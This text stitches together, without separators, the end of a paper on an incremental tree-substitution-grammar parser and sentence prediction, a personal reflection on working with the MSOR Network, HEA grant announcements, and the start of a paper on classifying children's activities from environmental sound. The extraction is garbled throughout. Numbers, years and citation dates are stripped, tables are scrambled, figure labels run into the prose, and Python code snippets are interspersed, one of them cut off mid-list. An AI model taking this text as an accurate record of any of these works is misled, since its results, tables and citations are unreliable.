f-score over the schuler parser. when we compare the different pars- ing objectives of the itsg parser, mrp is the best one, followed by mpp and mpd. incremental parsing the graphs in figure com- pare the itsg and roark’s parser on the incremental parsing evaluation, when parsing sentences of length , , and . the performance of both models declines as the length of the prefix increases, with roark’s parser outperforming the itsg parser on average, although the itsg parser seems more com- we used a modified version of a script by nathaniel smith available at https://github.com/njsmith/pysrilm. note that the scores reported by demberg et al. ( ) are for tag structures, not for the original penn treebank trees. prefix length f- sc or e roark (last) itsg smooth. (mpd) roark et al. ( ) prefix length f- sc or e roark (last) itsg smooth. (mpd)itsg smooth. 
(mpd) f -s co re prefix length figure : partial parsing results for sentences of length , , , and (from upper left to lower right). petitive when parsing prefixes for longer (and there- fore more difficult) sentences. sentence prediction table compares the sen- tence prediction results of the itsg and the lan- guage model (srilm). the latter is outperforming the former when predicting the next word of a pre- fix, i.e. prd( ), whereas itsg is better than the lan- guage model at predicting a single future word, i.e. prs( ). when more than one (consecutive) word is considered, the srilm model exhibits a slightly better recall while itsg achieves a large gain in pre- cision. this illustrates the complementary nature of the two models: while the language model is better at predicting the next word, the itsg predicts future words (rarely adjacent to the prefix) with high con- fidence ( . % lcs precision). however, it makes predictions for only a small number of words ( . % lcs recall). examples of sentence predictions can be found in table . related work to the best of our knowledge, there are no other in- cremental tsg parsers in the literature. the parser of demberg et al. ( ) is closely related, but uses tree-adjoining grammar, which includes both sub- stitution and adjunction. that parser makes predic- tions, but only for upcoming structure, not for up- coming words, and thus cannot be used directly for sentence prediction. the incremental parser of roark ( ) uses a top-down algorithm and works itsg srilm correct r p correct r p prd( ) , . . , . . prd( ) . . , . . prd( ) . . . . prd( ) . . . . prs( ) , . . , . . prs( ) , . . , . . prs( ) , . . , . . prs( ) . . . . lcs , . . , . . table : sentence prediction results. prefix shares of ual , the parent prd( ) prs( ) itsg company of united airlines , − − srilm company , which is the − − goldstd of united airlines , were extremely active all day friday . prefix pse said it expects to report earnings of $ . million to $ . million , or itsg cents a share , − + srilm % to $ unk − − goldstd cents to cents a share . table : examples comparing sentence predictions for itsg and srilm (unk: unknown word). on the basis of context-free rules. these are aug- mented with a large number of non-local fea- tures (e.g., grandparent categories). our approach avoids the need for such additional features, as tsg fragments naturally contain non-local informa- tion. roark’s parser outperforms ours in both full- sentence and incremental f-score (see section ), but cannot be used for sentence prediction straight- forwardly: to obtain a prediction for the next word, we would need to compute an argmax over the whole vocabulary, then iterate this for each word af- ter that (the same is true for the parsers of schuler et al., and demberg et al., ). most in- cremental dependency parsers use a discriminative model over parse actions (nivre, ), and there- fore cannot predict upcoming words either (but see huang and sagae ). turning to the literature on sentence prediction, we note that ours is the first attempt to use a parser for this task. existing approaches either use n-gram models (eng and eisner, ; bickel et al., ) or a retrieval approach in which the best matching sen- tence is identified from a sentence collection given a set of features (grabski and scheffer, ). there is also work combining n-gram models with lexical semantics (li and hirst, ) or part-of-speech in- formation (fazly and hirst, ). 
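To make the three prediction measures used in the evaluation above (prd(m), prs(m), and lcs) concrete, the following Python sketch computes them for a single prefix, given the model's predicted continuation and the words that actually follow the prefix in the original sentence. It is our own reformulation of the definitions and omits the aggregation of recall and precision over all prefixes:

```python
def prd(predicted, gold, m):
    """word prediction prd(m): if the model predicts at least m words, the
    prediction is correct iff the first m predicted words are identical to the
    m words following the prefix; prefixes with fewer than m predicted words
    return None (they count towards recall but not precision)"""
    if len(predicted) < m:
        return None
    return predicted[:m] == gold[:m]

def is_subsequence(sub, seq):
    """True iff `sub` occurs, in order, within `seq`"""
    it = iter(seq)
    return all(word in it for word in sub)

def prs(predicted, gold, m):
    """word presence prs(m): correct iff the first m predicted words occur,
    in the same order, among the words following the prefix"""
    if len(predicted) < m:
        return None
    return is_subsequence(predicted[:m], gold)

def lcs_length(predicted, gold):
    """length of the longest common subsequence between the predicted words
    and the words following the prefix (basis of the lcs measure)"""
    n, m = len(predicted), len(gold)
    table = [[0] * (m + 1) for _ in range(n + 1)]
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            if predicted[i - 1] == gold[j - 1]:
                table[i][j] = table[i - 1][j - 1] + 1
            else:
                table[i][j] = max(table[i - 1][j], table[i][j - 1])
    return table[n][m]
```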
in the language modeling literature, more sophis- ticated models than simple n-gram models have been developed in the past few years, and these could potentially improve sentence prediction. ex- amples include syntactic language models which have applied successfully for speech recognition (chelba and jelinek, ; xu et al., ) and ma- chine translation (schwartz et al., ; tan et al., ), as well as discriminative language models (mikolov et al., ; roark et al., ). future work should evaluate these approaches against the itsg model proposed here. conclusions we have presented the first incremental parser for tree substitution grammar. incrementality is moti- vated by psycholinguistic findings, and by the need for real-time interpretation in nlp. we have shown that our parser performs competitively on both full sentence and sentence prefix f-score. we also intro- duced sentence prediction as a new way of evaluat- ing incremental parsers, and demonstrated that our parser outperforms an n-gram model in predicting more than one upcoming word. the performance of our approach is likely to im- prove by implementing better binarization and more advanced smoothing. also, our model currently con- tains no conditioning on lexical information, which is also likely to yield a performance gain. finally, future work could involve replacing the relative fre- quency estimator that we use with more sophisti- cated estimation schemes. acknowledgments this work was funded by epsrc grant ep/i / “an integrated model of syntac- tic and semantic prediction in human language processing”. we are grateful to brian roark for clarifying correspondence and for guidance in using his incremental parser. we would also like to thank katja abramova, vera demberg, mirella lapata, andreas van cranenburgh, and three anonymous reviewers for useful comments. references alfred v. aho and jeffrey d. ullman. . the theory of parsing, translation, and compiling. prentice-hall, inc., upper saddle river, nj. gerry t. m. altmann and yuki kamide. . incre- mental interpretation at verbs: restricting the do- main of subsequent reference. cognition, : – . steffen bickel, peter haider, and tobias scheffer. . predicting sentences using n-gram lan- guage models. in proceedings of the conference on human language technology and empirical methods in natural language processing, pages – . vancouver. rens bod. . the problem of computing the most probable tree in data-oriented parsing and stochastic tree grammars. in proceedings of the th conference of the european chapter of the association for computational linguistics, pages – . association for computer linguistics, dublin. rens bod, khalil sima’an, and remko scha. . data-oriented parsing. university of chicago press, chicago, il. ciprian chelba and frederick jelinek. . struc- tured language modeling. computer speech and language, : – . vera demberg and frank keller. . data from eye-tracking corpora as evidence for theories of syntactic processing complexity. cognition, ( ): – . vera demberg, frank keller, and alexander koller. . parsing with psycholinguistically moti- vated tree-adjoining grammar. computational linguistics, ( ). in press. jay earley. . an efficient context-free pars- ing algorithm. communications of the acm, ( ): – . john eng and jason m. eisner. . radiology report entry with automatic phrase completion driven by language modeling. radiographics, ( ): – . afsaneh fazly and graeme hirst. . testing the efficacy of part-of-speech information in word completion. 
in proceedings of the eacl work- shop on language modeling for text entry meth- ods, pages – . budapest. joshua goodman. . parsing algorithms and metrics. in proceedings of the th annual meet- ing on association for computational linguistics, pages – . association for computational linguistics, santa cruz. korinna grabski and tobias scheffer. . sen- tence completion. in proceedings of the th an- nual international acm sir conference on re- search and development in information retrieval, pages – . sheffield. liang huang and kenji sagae. . dynamic pro- gramming for linear-time incremental parsing. in proceedings of the th annual meeting of the association for computational linguistics, pages – . association for computational lin- guistics, uppsala. dan klein and christopher d. manning. . ac- curate unlexicalized parsing. in proceedings of the st annual meeting on association for com- putational linguistics, pages – . associa- tion for computational linguistics, sapporo. jianhua li and graeme hirst. . semantic knowledge in a word completion task. in pro- ceedings of the th international acm sigac- cess conference on computers and accessibil- ity, pages – . baltimore. mitchell p. marcus, mary ann marcinkiewicz, and beatrice santorini. . building a large anno- tated corpus of english: the penn treebank. com- putational linguistics, ( ): – . tomas mikolov, martin karafiat, jan cernocky, and sanjeev. . recurrent neural network based language model. in proceedings of the th annual conference of the international speech communication association, pages – . florence. joakim nivre. . incremental non-projective dependency parsing. in proceedings of human language technologies: the annual conference of the north american chapter of the associa- tion for computational linguistics, pages – . association for computational linguistics, rochester. slav petrov. . coarse-to-fine natural lan- guage processing. ph.d. thesis, university of california at bekeley, berkeley, ca. brian roark. . probabilistic top-down parsing and language modeling. computational linguis- tistics, : – . brian roark, asaf bachrach, carlos cardenas, and christophe pallier. . deriving lexical and syntactic expectation-based measures for psy- cholinguistic modeling via incremental top-down parsing. in proceedings of the conference on em- pirical methods in natural language processing, pages – . association for computational linguistics, singapore. brian roark, murat saraclar, and michael collins. . discriminative n-gram language modeling. computer speech and language, ( ): – . d. j. rosenkrantz and p. m. lewis. . deter- ministic left corner parsing. in proceedings of the th annual symposium on switching and au- tomata theory, pages – . ieee computer society, washington, dc. federico sangati, willem zuidema, and rens bod. . efficiently extract recurring tree fragments from large treebanks. in nicoletta calzolari, khalid choukri, bente maegaard, joseph mar- iani, jan odijk, stelios piperidis, mike rosner, and daniel tapias, editors, proceedings of the th internationalconference on language resources and evaluation. european language resources association, valletta, malta. yves schabes. . mathematical and computa- tional aspects of lexicalized grammars. ph.d. thesis, university of pennsylvania, philadelphia, pa. william schuler, samir abdelrahman, tim miller, and lane schwartz. . broad-coverage pars- ing using human-like memory constraints. com- putational linguististics, ( ): – . 
lane schwartz, chris callison-burch, william schuler, and stephen wu. . incremental syn- tactic language models for phrase-based transla- tion. in proceedings of the th annual meeting of the association for computational linguistics: human language technologies, volume , pages – . association for computational linguis- tics, portland, or. khalil sima’an. . computational complexity of probabilistic disambiguation by means of tree- grammars. in proceedings of the th confer- ence on computational linguistics, pages – . association for computational linguistics, copenhagen. andreas stolcke. . an efficient probabilis- tic context-free parsing algorithm that computes prefix probabilities. computational linguistics, ( ): – . andreas stolcke. . srilm – an extensible lan- guage modeling toolkit. in proceedings interna- tional conference on spoken language process- ing, pages – . denver, co. scott c. stoness, joel tetreault, and james allen. . incremental parsing with reference inter- action. in frank keller, stephen clark, matthew crocker, and mark steedman, editors, proceed- ings of the acl workshop incremental parsing: bringing engineering and cognition together, pages – . association for computational lin- guistics, barcelona. ming tan, wenli zhou, lei zheng, and shaojun wang. . a large scale distributed syntac- tic, semantic and lexical language model for ma- chine translation. in proceedings of the th annual meeting of the association for compu- tational linguistics: human language technolo- gies, volume , pages – . association for computational linguistics, portland, or. michael k. tanenhaus, michael j. spivey- knowlton, kathleen m. eberhard, and julie c. sedivy. . integration of visual and linguistic information in spoken language comprehension. science, : – . peng xu, ciprian chelba, and frederick jelinek. . a study on richer syntactic dependencies for structured language modeling. in proceedings of the th annual meeting on association for computational linguistics, pages – . as- sociation for computational linguistics, philadel- phia. msor connections vol no summer � first steps when the msor network was formed in i was a first year undergraduate student of mathematics at the university of nottingham with, typically, no idea what i wanted to do afterwards. after graduating in i was recruited by stephen hibberd and cliff litton at nottingham to develop their virtual learning environment for service mathematics called melees. this appointment was for four months before i started a masters degree in computing and was my first experience of he mathematics from the point of view of the teacher. the first published article with my name on it anywhere was an account of the implementation of melees in msor connections in [ ]. later that year pam bishop published a report i wrote on the state of mathml implementation in current web browsers on the msor network website [ ]. encouraged by this, in i submitted an account of my msc dissertation [ ], on e-assessment in mathematics, to cliff beevers’ maths-caa series which was published online by the msor network from - . disability my interest in mathml led me to issues of accessibility. my first solo article in msor connections [ ], submitted with confidence gained from my earlier publishing experiences, was a short piece in about a new version of mathplayer which could convert mathml to speech. 
this was an entry in the ‘have you seen this...?’ series, which offered a quick publishing route for short items that might not warrant an in depth article but were worth bringing to wider attention. it was also listed as ‘dda update’, a series which provided disability-related updates in response to new legislation. in my now-wife emma and i re-launched the ‘dda update’ series of articles [ ], re-titling this partly to reflect changes to the legislation but mostly to move the focus from the negative – legislative necessity – to focus on ‘supporting disabled students’. in , following an invitation from michael grove, i formed a working group ‘accessing maths, stats and or’ (accessmsor) to take an interest in disability matters. we sent a general invitation for interested people to come to nottingham trent university for a wide-ranging discussion on disability and msor. this initial meeting was reported, of course, in msor connections [ ]. around this time emma and i, with michael whapples, received funding through the msor network mini-projects scheme to investigate visual impairment and particularly the use of braille to communicate mathematics. we took a paper based on this project to the cetl-msor conference and this was published in msor connections [ ]. peter rowlett msor network university of birmingham p.rowlett@bham.ac.uk early career connections with msor peter rowlett msor connections vol no summer � my final act as chair of the working group was to run a one- day workshop giving the findings of our project and others doing similar work. afterwards, we published contributions from speakers through msor connections [ ]. technology given my interest in mathml and related technologies, i initiated a new series of articles in msor connections in on mathml and xml technologies [ ]. i wrote other articles about different technologies, graphics [ ], blogging [ ] and video [ ], in and . these contributions are descriptive, written from the point of view of the uncritical enthusiast. they basically assume that you might want to use these technologies and offer a guide of how to do so. in i started travelling around the uk for the institute of mathematics and its applications (ima). this exposed me to different approaches taken at many institutions and led to many tearoom chats with mathematics lecturers about their practice. some had read an article i had written in connections and were interested to learn more, others were interested in how departments i had visited approached the issues they were having. in i started working again for the university of nottingham, this time in a more general role supporting lecturers in their teaching through technology. exposure to different approaches and the need to answer questions such as ‘why would i want to introduce this technology into my teaching?’ led me to lose some of my wide-eyed enthusiasm and take an interest in questions of why we might use technology in education. the first evidence of this change in print came with an article in msor connections in about response system use [ ]. this took a sceptical look at the technology and asked when, and indeed if, this technology could be used effectively. interest in this led to a study at nottingham of student reaction to response system use, presented at the cetl-msor conference and published in its proceedings [ ]. a later contribution to msor connections took a similar approach to lecture capture technology [ ]. 
now and next later in i started working for the msor network on a project in mathematical sciences he curriculum innovation as part of the national he stem programme, reported regularly through msor connections [ ]. in , as part of this, i was lucky enough to edit a special issue with contributions from some of the work we are supporting [ ]. my interest in higher education mathematics is quite practical – i hope to improve my own practice and help others develop theirs. i think it is extremely valuable for our community to have somewhere to place practitioner articles that might not be suitable for a full research journal. in connections, people could present the implementation of ideas in development, as we did with melees, or provide quick pointers to items of note, as i did with mathplayer. articles could be published giving simple examples of use of technologies, such as the ones i wrote on graphics, blogging and video, or attempts to read around a topic, as with the articles on response systems and lecture capture. msor connections also saw interesting opinion pieces by established expert practitioners, grounded in experience rather than research literature but interesting to reflect on and learn from nonetheless. it is interesting, too, to look back and reflect on the wider impact of work that started in msor connections. the gathering of the accessmsor community (still going strong under new chair emma cliffe) and the research project into the experiences of students with visual impairments would likely not have occurred, thematically and practically, without us first publishing articles on disability through connections. writing those early naive articles on technology implementation led to interesting discussions and drew me to a point in my career where i would begin to question the effectiveness of such technologies in a way i hope is useful. critically evaluating response systems in connections led to a research investigation and a cetl- msor conference paper. many times, writing an article for connections has driven me to think about a topic in depth and genuinely learn and develop myself. (and i haven’t even mentioned reading articles!) while the msor network has existed, i have gone from undergraduate student to be involved with delivering teaching, from uncritical technology enthusiast to take a broader interest in higher education mathematics and how technology and other aspects can work together to improve learning and the student experience. it now seems almost certain i will be with the msor network at the end. the work of the network will continue through the hea discipline lead and i am delighted to hear that msor connections will continue too. where i go from here, professionally, is quite uncertain but i feel positive that i go there very much the better for my experience interacting with the msor network and its connections. references hibberd, s., litton, c., chambers, c. and rowlett, p., . melees – e-support or mayhem? msor connections, ( ), pp. - . rowlett, p., . mathml: the current state of play [online]. msor network. available via: http://mathstore.ac.uk/mathml/rowlett.html [last accessed / / ]. rowlett, p.j., . pseudo-randomised caa by “preprocessing” mathml. maths-caa series [online], september. available via: http://www.mathstore.ac.uk/ repository/mathscaa_sep .pdf [last accessed / / ]. . . . early career connections with msor – peter rowlett msor connections vol no summer � rowlett, p., . 
mathplayer and the design science mathematics accessibility project. msor connections, ( ), p. . wright, e.j. and rowlett, p.j., . introducing the supporting students with disabilities series: disability legislation update. msor connections, ( ), pp. - . rowlett, e.j., rowlett, p.j. and surowiec, r., . accessmsor: report on inaugural meeting. msor connections, ( ), p. . rowlett, e.j. and rowlett, p.j., . visual impairment in msor. msor connections, ( ), pp. - . rowlett, p. et al., . workshop report…visual impairment in maths, stats and operational research (msor). msor connections, ( ), pp. - . rowlett, p.j., . mathml/xml series: an introduction. msor connections, ( ), pp. - . rowlett, p.j., . a simple example of dynamic graphics. msor connections, ( ), pp. - . rowlett, p.j., . some approaches to mathematical blogging. msor connections, ( ), pp. - . rowlett, p.j., . a quick and easy (rough and ready) method for online video. msor connections, ( ), pp. - . rowlett, p., . ask the audience (yes, all of them). msor connections, ( ), pp. - . barton, s. and rowlett, p., . using an audience response system – what do the audience do with the feedback? proceedings of the cetl-msor conference , university of birmingham, th- th september , pp. - . rowlett, p., . lecture capture technology – technically possible, but can it be used effectively? msor connections, ( ), pp. - . rowlett, p., . introducing the mathematical sciences he curriculum innovation project. msor connections, ( ), p. . rowlett, p. (ed.), . msor connections, ( ). . . . . . . . . . . . . . . early career connections with msor – peter rowlett the hea is currently inviting subscribing institutions in the uk delivering higher education to participate as part of the discipline workshop and seminar series for - . grants of £ are being offered to institutions wishing to host and deliver a workshop or seminar on teaching and learning in the mathematics, statistics and operational research discipline and to produce an associated report for the sector. in order to participate in the scheme a proposal form needs to be submitted to seminarseries@heacademy.ac.uk by september . the proposal form is available at http://www.heacademy.ac.uk/seminar-series, where more detailed information about the scheme can also be found. hea discipline workshops and seminars the next call for hea teaching development grants opens on tuesday august. the call will be for departmental grants of up to £ , , with a submission deadline on thursday september. % of the funding will be for projects in the areas of (i) assessment and feedback and (ii) flexible learning. the remaining % will be allocated to an open call for innovative pedagogic work. details of the scheme can be found at http://www.heacademy.ac.uk/tdg. a further call for collaborative teaching development grants will open in january . hea teaching development grants deep artificial neural network based on environmental sound data for the generation of a children activity classification model deep artificial neural network based on environmental sound data for the generation of a children activity classification model antonio garcía-domínguez ,*, carlos e. galvan-tejada ,*, laura a. zanella-calzada , hamurabi gamboa , jorge i. galván-tejada , josé maría celaya padilla , huizilopoztli luna-garcía , jose g. 
arceo-olague and rafael magallanes-quintanar unidad académica de ingeniería eléctrica, universidad autónoma de zacatecas, zacatecas, zacatecas, méxico loria, université de lorraine, nancy, france conacyt, universidad autónoma de zacatecas, zacatecas, zacatecas, méxico * these authors contributed equally to this work. abstract children activity recognition (car) is a subject for which numerous works have been developed in recent years, most of them focused on monitoring and safety. commonly, these works use as data source different types of sensors that can interfere with the natural behavior of children, since these sensors are embedded in their clothes. this article proposes the use of environmental sound data for the creation of a children activity classification model, through the development of a deep artificial neural network (ann). initially, the ann architecture is proposed, specifying its parameters and defining the necessary values for the creation of the classification model. the ann is trained and tested in two ways: using a – approach ( % of the data for training and % for testing) and with a k-fold cross- validation approach. according to the results obtained in the two validation processes ( – splitting and k-fold cross validation), the ann with the proposed architecture achieves an accuracy of . % and . %, respectively, which allows to conclude that the developed model using the ann and its proposed architecture achieves significant accuracy in the children activity classification by analyzing environmental sound. subjects artificial intelligence, data mining and machine learning, data science keywords children activity recognition, environmental sound, machine learning, deep artificial neural network, environmental intelligence, human activity recognition introduction environmental intelligence is an area of artificial intelligence that has made great progress in recent years (cook, augusto & jakkula, ), mainly driven by the development of new devices and sensors that facilitate data capture and processing (stipanicev, bodrozic & stula, ). advances in this area have gone hand in hand with the development of the internet of things (iot) (wortmann & flüchter, ; li, da xu & zhao, ) and smart cities (albino, berardi & dangelico, ; arasteh et al., ), in which can be found how to cite this article garcía-domínguez a, galvan-tejada ce, zanella-calzada la, gamboa h, galván-tejada ji, celaya padilla jm, luna-garcía h, arceo-olague jg, magallanes-quintanar r. . deep artificial neural network based on environmental sound data for the generation of a children activity classification model. peerj comput. sci. :e doi . /peerj-cs. submitted may accepted october published november corresponding author antonio garcía-domínguez, antonio.garcia@uaz.edu.mx academic editor pinar duygulu additional information and declarations can be found on page doi . /peerj-cs. copyright garcía-domínguez et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:antonio.�garcia@�uaz.�edu.�mx https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ different intelligent systems created to provide services to population. 
the most recent developments have focused on applications that facilitate the interaction of human beings with their environment, in different areas such as engineering (gupta et al., ; corno & de russis, ), medicine (roda et al., ; ziuziański, furmankiewicz & sołtysik- piorunkiewicz, ), energy (robinson, sanders & mazharsolook, ; cristani, karafili & tomazzoli, ), ambient assisted living (lloret et al., ; blasco et al., ; memon et al., ), among others (al nuaimi et al., ; hu & ni, ). many of the projects developed and implemented in this area rely on human activity recognition (har) systems, which base their operation on the use of different sensors as a data source to determine the activity that a person or group of people are performing and with this information provide some kind of service (alahi et al., ; uddin, ; cippitelli et al., ; burbano & carrera, ; ignatov, ; rafferty et al., ). in works related to human activity recognition and classification, different data sources have been used to collect information about the activity to be analyzed. the most common data sources used are video (caba heilbron et al., ; boufama, habashi & ahmad, ), audio (liang & thomaz, ; galván-tejada et al., ), radio frequency identification (rfid) devices (li et al., ; wang & zhou, ) and smartphones sensors (wang et al., ), such as the accelerometer (lee, yoon & cho, ). another important aspect to consider is the group of people to whom the study is directed, since the type of data source to use, the techniques and algorithms used depend on it. most applications on human activity recognition and classification are designed considering adults as the group of interest (reyes-ortiz et al., ; hammerla, halloran & plötz, ; concone, re & morana, ; brophy et al., ; lyu et al., ). another group of people for which works are commonly developed are the elderly, especially for automatic assisted living and health care (capela, lemaire & baddour, ; sebestyen, stoica & hangan, ; de la concepción et al., ). children are a group for which it is also common to develop applications for monitoring and safety (mannini et al., ; kurashima & suzuki, ; trost et al., ). the children’s activities recognition and classification is a topic that has attracted the attention of many researchers due to the implications and variables involved. there are several factors to consider such as: ( ) number of individuals. the number of children acting simultaneously is undoubtedly an important aspect to be considered, since the complete design of the system changes if activities for , , or a group of children are analyzed. ( ) age of children. because the activities that children perform are related to their age, the set of activities considered for the analysis changes for each defined group of children. ( ) place of analysis of activities. the environment in which the activity analysis is performed is also an important factor to be considered, since there are external factors that can affect some processes (e.g., a noisy environment would affect the data capture process when working on human activity recognition using environmental sound). and ( ) data source. the type of data used for the analysis of activities is a fundamental variable for the system, since its entire design depends on this. if you work garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ with images, audio, video, embedded sensors or audio, the way to act changes in each situation. 
in the area of children activity recognition and classification common data sources are video cameras, accelerometers and rfid devices (westeyn et al., ; boughorbel et al., ; shoaib et al., ; mannini et al., ). most of the works presented in this area perform the data capture process using wearable sensors, making it possible to identify types of disadvantages: . interference with the children’s natural behavior. wearing wearable sensors can cause the children, by their curious instincts, to become distracted by feeling a foreign object to him and not perform activities normally (e.g., crying because they want to remove the sensor). this type of behavior would cause an alteration in the captured data or that these were not representative of the activities commonly performed by the children and that are being subject to analysis. . possible physical damage to sensors. the fact that the sensor is located in one of the clothes or parts of the children’s body makes possible the risk that the sensor may suffer physical damage while the children perform the activities, because they are unpredictable (e.g., to wet or hit a smart watch). the sensors are generally not made for rough use, so improper use or even physical damage could represent inappropriate data capture for the system. to mitigate the problem of using wearable sensors, it is necessary to use a different data source that does not interfere with the analyzed activities, for this purpose sound has been used in some works as data source (galván-tejada et al., ; sim, lee & kwon, ). capturing audio data has the advantage that the capture device does not necessarily have to be carried by the individual who is performing the activity, but can be located in a nearby place where it does not interfere with the performed activities. in addition, it is not necessary to use special equipment or sensors to capture data, since it is possible to use the microphone present in smartphones. machine learning is a branch of artificial intelligence that, since its appearance, has been applied to a wide variety of problems due to the good results it has shown in terms of data analysis, especially in classification problems, such as the presented in this work. machine learning has the particularity of being able to be applied to an endless number of problems, with different types of data to analyze. different applications based on machine learning for the analysis of audio data have been developed, among the main commercial applications developed are voice assistants, such as alexa (hoy, ; kepuska & bohouta, ), siri (aron, ; kepuska & bohouta, ) and cortana (bhat, lone & paul, ; hoy, ), for the amazon, apple and microsoft companies respectively, as well as google’s voice assistant (lópez, quesada & guerrero, ). in machine learning, specifically deep neural networks have also been widely used for analysis of audio data, as in wavenet (van der oord et al., ), a deep neural network for generating raw audio waveforms. it is also common to find works based on machine garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ learning focused on audio data classification (zhang et al., ; zeng et al., ; lu, zhang & nayak, ; piczak, ; rong, ; hershey et al., ). 
for the generation of a human activity recognition and classification model, it is necessary to implement a machine learning classification algorithm (jordan & mitchell, ; nikam, ; fatima & pasha, ), which after being trained with a set of training data, is able to classify new data among the analyzed classes. some of the most commonly used classification algorithms in this area are support vector machine (svm) (chen et al., ), k-nearest neighbor (knn) (paul & george, ), random forests (rf) (uddin, billah & hossain, ), extra trees (et) (uddin & uddiny, ) and artificial neural networks (ann) (ronao & cho, ; suto & oniga, ; murad & pyun, ). in recent years there have been numerous works based on ann focused on the creation of activity recognition models, due to the performance and efficiency they have shown (ronao & cho, ; hassan et al., ; jiang & yin, ; nweke et al., ; lubina & rudzki, ; myo, wettayaprasit & aiyarak, ). the accuracy of the classifier model depends on the algorithm used and the analyzed data. when working with audio, it is possible to extract features of the signals to serve as input for the classification algorithms. the number and type of features extracted depends on the application and the type of analysis to be performed. previously, we presented a work that implemented the classification algorithms svm, knn, random forests, extra trees and gradient boosting in the generation of a children activity classification model using environmental sound data, working with a -feature set extracted from the audios samples, and the classifier that achieves a higher accuracy was knn with % (blanco-murillo et al., ). in addition, a work was previously presented where the same classification algorithms mentioned above were analyzed and a -feature subset was used for the generation of the models, achieving accuracies greater than % (garca-domnguez et al., ). continuing the previous works, we also developed a children activity recognition and classification model using environmental sound through a -feature subset, chosen by genetic algorithms. in that work, the same classifying algorithms mentioned in the previous works were used and the maximum accuracy obteined was % (garca-dominguez et al., ). in the present work, the architecture of a deep ann is proposed for its implementation as machine learning algorithm in the generation of a children activity recognition model using environmental sound, in an environmental noise-free environment and analyzing activities of children acting individually. a -feature set is extracted from the analyzed dataset, which is used in the generation of the model. the classification model is trained and evaluated in terms of accuracy to obtain the performance of the classification algorithm. two validation approaches are used: – split ( % of the data for training and % for testing), and a k-fold cross validation. this document is organized as follows: the materials and methods are described in detail in “materials and methods”. in “experiments and results” the experiments performed and the results obtained are reported. the discussion and conclusions are described in “conclusions”. finally, future work is presented in “future work”. garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
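before turning to the materials and methods, the sketch below shows how the classical baselines mentioned in this introduction (svm, knn, random forests, extra trees and gradient boosting) could be trained on a table of extracted audio features with scikit-learn. the file name, column names and parameter values are illustrative only and are not taken from the original studies.

```python
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import (RandomForestClassifier, ExtraTreesClassifier,
                              GradientBoostingClassifier)

# Hypothetical CSV: one row per 1-s clip, feature columns plus an 'activity' label.
data = pd.read_csv("children_activity_features.csv")
X = data.drop(columns=["activity"])
y = data["activity"]

X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.3, stratify=y, random_state=0)

baselines = {
    "svm": SVC(kernel="rbf"),
    "knn": KNeighborsClassifier(n_neighbors=5),
    "random forest": RandomForestClassifier(n_estimators=100),
    "extra trees": ExtraTreesClassifier(n_estimators=100),
    "gradient boosting": GradientBoostingClassifier(),
}

for name, clf in baselines.items():
    clf.fit(X_train, y_train)
    print(name, clf.score(X_test, y_test))  # mean accuracy on the held-out 30%
```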
https://peerj.com/computer-science/ materials and methods this section describes in detail the used dataset, made up of audio recordings of the different activities to be analyzed, as well as the extracted features used to generate the classification model. likewise, the methodology used throughout the experimentation is described. for the design and implementation of the deep ann presented in this work, the python programming language is used (van rossum, ), through the keras (chollet, ) library, an api (application programming interface) of high-level ann, and the tensorflow abadi et al. ( ) library, which is the most widely used deep learning platform today. dataset description the data set used for this work is the same as the used in previous works about children activity recognition (garca-domnguez et al., , ) and no extra processing was done. the audios analyzed belong to four different activities, shown in table . as shown in delgado-contreras et al. ( ), tarzia et al. ( ), -s audio clips seem to be long enough to obtain potentially useful information in the process of classifying activities by analyzing environmental sound. in the dataset used, the audio recordings with a duration greater than s were divided to generate a greater number of samples. for the analysis of the activities, -s samples are taken. each of the audio recordings in the dataset used belongs to a single activity, so the produced -s clips also belong to a single activity. table shows the number of audio recordings and -s samples that the dataset has for each activity to be analyzed. as shown in table , the dataset used for the presented work consists of , -s audio clips and the amount of audios per class is balanced ( . %, . %, . % and . % crying, playing, running and walking, respectively). there is no rule to define the table general description of activities. activity description crying emitting crying sound in reaction to some event playing handling plastic pieces running moving quickly from one place to another walking moving from one place to another at medium speed table recordings and audio clips per activity. activity generated taken from internet total recordings clips recordings clips recordings clips crying playing running walking garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ minimum size of a dataset analyzed using machine learning techniques, the only general recommendation is that it be as large as possible, but that is in particular for each case and type of generated model (e.g., barbedo ( ) analyzed the size of the dataset for plant disease classification, dutta & gros ( ) did it for the classification of medical images and oyedare (oyedare & park, ) did it for the classification of transmitters through deep learning). and precisely one of the points to perform as future work for the present work is an analysis of the dataset and consider expanding it if necessary. for the feature extraction process, a set of numerical features are extracted from the -s intervals of the audio signals, these features are shown in table . these extracted features are those commonly used in audio analysis and activity recognition through audio (scheirer, ; wang et al., ), especially the mel-frequency spectral coefficients, since many audio analysis works that make use of them have been developed (galván-tejada et al., ; stork et al., ; mascia et al., ). 
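the paper does not name the extraction library at this point; purely as an illustration, a comparable per-clip feature vector (zero-crossing rate, energy, spectral shape descriptors, mfccs and chroma) could be computed with librosa roughly as follows. spectral entropy, spectral flux and chroma deviation are omitted because librosa has no direct helpers for them, so this approximates the feature set rather than reproducing it.

```python
import numpy as np
import librosa

def clip_features(path, sr=22050, n_mfcc=13):
    """Frame-averaged features for a single 1-s audio clip (illustrative subset)."""
    y, sr = librosa.load(path, sr=sr, duration=1.0)
    frame_features = [
        librosa.feature.zero_crossing_rate(y),           # zero crossing rate
        librosa.feature.rms(y=y),                         # energy (RMS)
        librosa.feature.spectral_centroid(y=y, sr=sr),    # spectral centroid
        librosa.feature.spectral_bandwidth(y=y, sr=sr),   # spectral spread
        librosa.feature.spectral_rolloff(y=y, sr=sr),     # spectral rolloff
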